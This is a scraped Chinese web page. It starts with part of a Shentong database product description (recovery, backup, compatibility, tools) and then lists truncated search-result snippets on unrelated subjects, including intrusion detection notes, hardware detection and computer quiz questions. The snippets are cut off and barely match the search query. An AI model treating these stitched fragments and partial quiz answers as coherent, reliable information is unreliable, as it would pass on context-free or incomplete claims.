    √ 实例故障恢复:神通数据库通过事务日志、控制文件、检查点等技术手段,保证数据库系统在意外宕机时能将数据快速恢复到一致状态并对外提供服务。新版本采用增量检查点、日志预分析、异步预取日志等技术大幅提升了实例恢复的速度,能达到原来恢复速度的3到5倍。

    √介质故障恢复:用户可以使用图形化的数据库维护工具对神通数据库实例执行物理备份、物理恢复等操作并对备份进行管理。提供在线和离线备份,支持容灾备份和恢复功能,支持完全备份、增量备份、差异备份、远程备份。支持备份点恢复、时间点恢复、完全恢复。支持定制调度任务,定时自动将备份数据存放在服务器端指定的文件夹中或共享的网络磁盘上。

    √数据库复制:通过逻辑日志同步、实时镜像复制等容灾方案,实现数据库异地容灾。

    (五)高兼容

    神通数据库管理系统与国内外主流硬件平台、操作系统、中间件、应用平台等方面做了充分兼容适配。并从语法结构、数据类型等方面与Oracle等异构数据库做了兼容。具体如下:

    √软硬件平台兼容性:支持国内外主流的操作系统、CPU硬件平台、中间件。支持windows、Linux等国内外主流操作系统;支持的CPU芯片包括:X86系列、龙芯、飞腾、申威、海光、兆芯等国内外主流CPU芯片;支持的中间件包括:Tomcat、WebLogic、东方通、中创、金蝶、普元等国内外主流中间件。

    √异构数据库兼容性:神通数据库支持对主流异构数据库(如:Oracle等)的兼容,包括对异构数据库的语法结构、数据类型等的兼容。利用神通数据库所提供数据迁移工具,支持在不同操作系统平台上对Oracle、SQLserver、Mysql、文本文件等不同数据源的数据迁移。

    √应用平台兼容:神通数据库兼容国内外主流云平台、兼容主流GIS平台、兼容主流开发语言和开发工具等。可兼容ArcGIS、超图、中地GIS等地理信息系统,可兼容C/C++、JAVA、.NET、Python、PHP、QT等主流开发语言和开发平台。

    (六)易管理、易使用

    神通数据库管理系统提供了全面的图形化跨平台数据库管理工具,方便DBA和开发人员操作使用。如:DBA管理控制平台、交互式SQL查询工具、数据迁移工具、数据库配置工具、逻辑备份和恢复工具、导入导出工具、数据库维护工具、审计工具、系统参数配置工具、性能监测工具等。

    (七)通用性

    √完全符合国际通用技术标准和技术规范。

    √支持多种数据类型(如:二进制大对象、自定义数据类型等)、丰富的内置函数、索引、主外键约束、触发器、存储过程、包、匿名块、层次查询、视图、物化视图、支持全文检索等数据库通用功能。

    展开全文
  • 【解析题】外观检测法对计算机病毒的防治没有作用【解析题】()于1946年提出了存储程序原理,现代电子计算机均按此原理设计【解析题】冯.诺依曼计算机【解析题】使用百度在网络上搜索资料,在计算机应用领域中属于____...
  • 入侵检测技术期末重点总结

    千次阅读 多人点赞 2019-07-01 16:15:44
    第一章、入侵检测概述 1.1入侵定义:入侵是指在非授权的情况下,试图存取信息、处理信息或破坏以使系统不可靠、不可用的故意行为。入侵检测定义:对入侵行为的发觉,它通过从计算机网络或计算机系统中的若干关键点...
  • 热工检测系统设计知识点总结

    千次阅读 多人点赞 2019-06-16 00:43:22
    热工检测系统设计第一章 热工检测系统概述热工检测的意义检测系统的基本结构火力发电厂简介火力发电厂的生产过程我国现有机组类型第二章 热工检测系统设计基础检测项目的确定热工检测仪表的选择电厂标识系统热工检测...
  • 什么是入侵检测系统

    千次阅读 2014-01-06 16:30:08
    原文地址:什么是入侵检测系统作者:亮剑家园入侵检测系统:  入侵检测是指监视或者在可能的情况下,阻止入侵或者试图控制你的系统或者网络资源的那种努力。入侵检测系统执行的主要任务包括:监视、分析用户及系统...
  • 通用技术知识点

    千次阅读 多人点赞 2020-06-26 00:18:59
    通用技术复习资料 /FU WEN CHAO/ 第一章走进技术世界 一、技术的价值: 1、技术与人的关系. 技术是人类满足自身的需求、愿望,更好的适应大自然,而采取的方法和手段。 (1)人类需要着衣裳遮身避寒- -纺织、印染、缝制...
  • 通用同步/异步收发(USART)STM32F103xC、 STM32F103xD和STM32F103xE增强系列产品中,内置了3个通用同步/异步收发(USART1、 USART2和USART3),和2个通用异步收发(UART4和UART5)。这5个接口提供异步通信、支持...
  • 计算机网络期末复习题

    万次阅读 2020-12-31 08:48:25
    2、下列传输介质中,哪种传输介质的抗干扰性最好? A、双绞线 B、光缆 C、同轴电缆 D、无线介质 3、采用全双工通信方式,数据传输的方向性结构______。 A、可以在两个方向上同时传输 B、只能在一个方向上传...
  • 渗透测试知识点--选择题

    千次阅读 2021-01-07 15:52:40
    RDP的端口号() A. 3389 B. 23 C. 22 D. 443 Burp Suite 是用于攻击()的集成平台。 A. web 应用程序 B. 客户机 C. 服务器 D. 浏览器 使用nmap进行ping扫描时使用的参数() A. -sP B. -p C. -p0 ...
  • Transformer 编码(中间行)对输入语言序列进行操作,并将其转换嵌入(Embedding),然后再将其传递给编码块。 Transformer 解码(底行)对先前生成的翻译语言输出和来自中间分支的编码输入序列进行操作,...
  • USB OTG原理+ ID 检测原理

    万次阅读 2016-06-15 07:29:30
    OTG 检测的原理是: USB OTG标准在完全兼容USB2.0标准的基础上,增添了电源管理(节省功耗)功能,它允许设备既可作为主机,也可作为外设操作(两用OTG)。USB OTG技术可实现没有主机时设备与设备之间的数据传输。...
  • python数据分析课后习题

    千次阅读 多人点赞 2021-11-15 19:52:46
    1.(单选题)下列关于数据和数据分析的说法正确的是(B) 2.(单选题)下列关于数据分析流程的说法错误的是(C) 3.(单选题)下列关于分析与建模流程的说法错误的是(A) 4.(单选题)下列关于模型评价与优化的说法正确的是...
  • 芯片制造中的软力量(下)

    千次阅读 2021-08-06 00:20:26
    在应变增强平面MOSFET的鼓励下,研究人员最近将单轴应力应用于具有金属栅极和高k电介质作为性能提升的多栅极器件。 随着每一代技术节点的发展,晶体管性能得到了提高。但是,仅从90 nm技术节点开始,对传统晶体...
  • 自动驾驶汽车涉及哪些技术?

    千次阅读 2020-09-03 10:41:52
    为了让大家对整车级的传感器有个概念,我们可以举个例子,中国新创出行企业华人运通旗下首款量产定型车高合HiPhi 1,号称全车搭载了超过500个传感器(雷达,摄像头都有),多达52个生物感测,用来感知人、车和...
  • 操作系统————选择题

    千次阅读 2018-12-04 22:38:42
    通用软件 D. 工具软件 2、操作系统是一组( )。 A.文件管理程序 B.中断处理程序 C.资源管理程序 D.设备管理程序 3、 操作系统是计算机系统的核心软件。按功能特征的不同,可把操作系统分为[1]、[2]、[3]、个人...
  • 几种常用的电机控制法

    千次阅读 2021-04-28 00:13:29
    这主要是因为在一个三相无刷电机(带有一个正统波反电动势)中所产生的转矩由下列等式来定义: 转轴转矩= Kt [IRSin(o) + ISSin(o+120) +ITSin(o+240)] 其中: o转轴的电角度 Kt电机的转矩常数 IR, IS和IT相位...
  • 十六进制码 50、 下列 4 组数应依次二进制、八进制和十六进制,符合这个要求的是 _D______ 。 A . 11 , 78 , 19 B . 12 , 77 , 10 C . 12 , 80 , 10 D . 11 , 77 , 19 51、 在计算机领域中,通常用...
  • 计算机定点加减溢出检测

    千次阅读 2020-03-05 23:18:15
    计算机定点加减溢出检测 溢出的概念 在定点整数机器中,数的表示范围 |x|<(2n−1)|x|<(2^n-1)。在运算过程中如出现大于字长绝对值的现象,称为“溢出”。在定点机器中,正常情况下溢出是不允许的。 例:设定点...
  • 在某些应用场合,比如通用仪表行业,系统的工作对象是不确定的,不同的对象就得采用不同的参数值,没法用户设定参数,就引入参数自整定的概念。实质就是在首次使用时,通过N次测量新的工作对象寻找一套参数,并...
  • Java编写的显示器显示模式检测程序 2个目标文件 内容索引:JAVA源码,系统相关,系统信息检测 用JAVA编写了一个小工具,用于检测当前显示器也就是显卡的显示模式,比如分辨率,色彩以及刷新频率等。 Java波浪文字制作...
  • 【NISP一级】考前必刷九套卷(五)

    千次阅读 2022-03-07 22:39:37
    下列选项中不是 HTTP 请求方法的是_________ A.BODY B.POST C.HEAD D.GET HTTP 消息(HTTP HEADER)又称 HTTP 头,包括请求头等四部分。请求头只出现在 HTTP 请求中,请求头允许客户端向服务器端传递...
  • 主宰操作系统的经典算法

    万次阅读 多人点赞 2020-07-24 15:22:50
    不过,先来先服务也是有缺点的,那就是没有优先级的关系,试想一下,如果有 100 个 I/O 进程正在排队,第 101 个是一个 CPU 密集进程,那岂不是需要等 100 个 I/O 进程运行完毕才会等到一个 CPU 密集进程运行,...
  • Elastic官方网络研讨会视频列表

    千次阅读 2021-04-09 11:07:24
    Elastic Stack由ElasticSearch、Kibana、Beats和Logstash组成,各种数据的搜索和分析提供了一个灵活和通用的工具。 不管您的用例是什么,如果您刚刚开始使用Elastic Stack,这个介绍性的视频将作为一个很好的资源...
  • SHT10传感器属于SHT1×系列(其他常用型号还有SHT11、SHT15),SHT1×属于Sensirion温湿度传感器家族中的贴片封装系列。传感器将传感元件和信号处理电路集成在一块微型电路板上,输出完全标定的数字信号。传感器...
  • 计算机组成原理选择题(带答案)

    千次阅读 2021-12-27 13:09:59
    假定有一个double变量,其机器数表示1122 3344 5566 7788H,存放在0000 8040H开始的连续存储单元中,则存储单元0000 8046H中存放的是( A ) A 22H B 33H C 77H D 66H 2. (单选题, 5分)下列命令组合的一次...
  • 第一步,将接收波形转换一个独立数值;第二步,比较该数值与门限值,并且判断发送信号。其次讨论了如何选择最佳门限值的问题,还证明了采用线性滤波器(即匹配滤波器或相关)可以获得最大信噪比,从而最小化差错...
  • 软件测试习题

    千次阅读 2021-06-14 19:11:43
    1、软件缺陷处理流程:提交→分配→确认→处理→复测→关闭,具体如下图所示: 图1-1 软件缺陷处理流程 (1)提交:测试人员发现缺陷之后,将缺陷提交给测试组长。 (2)分配:测试组长接收到测试组员提交的缺陷...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 12,870
精华内容 5,148
关键字:

下列为通用型检测器的是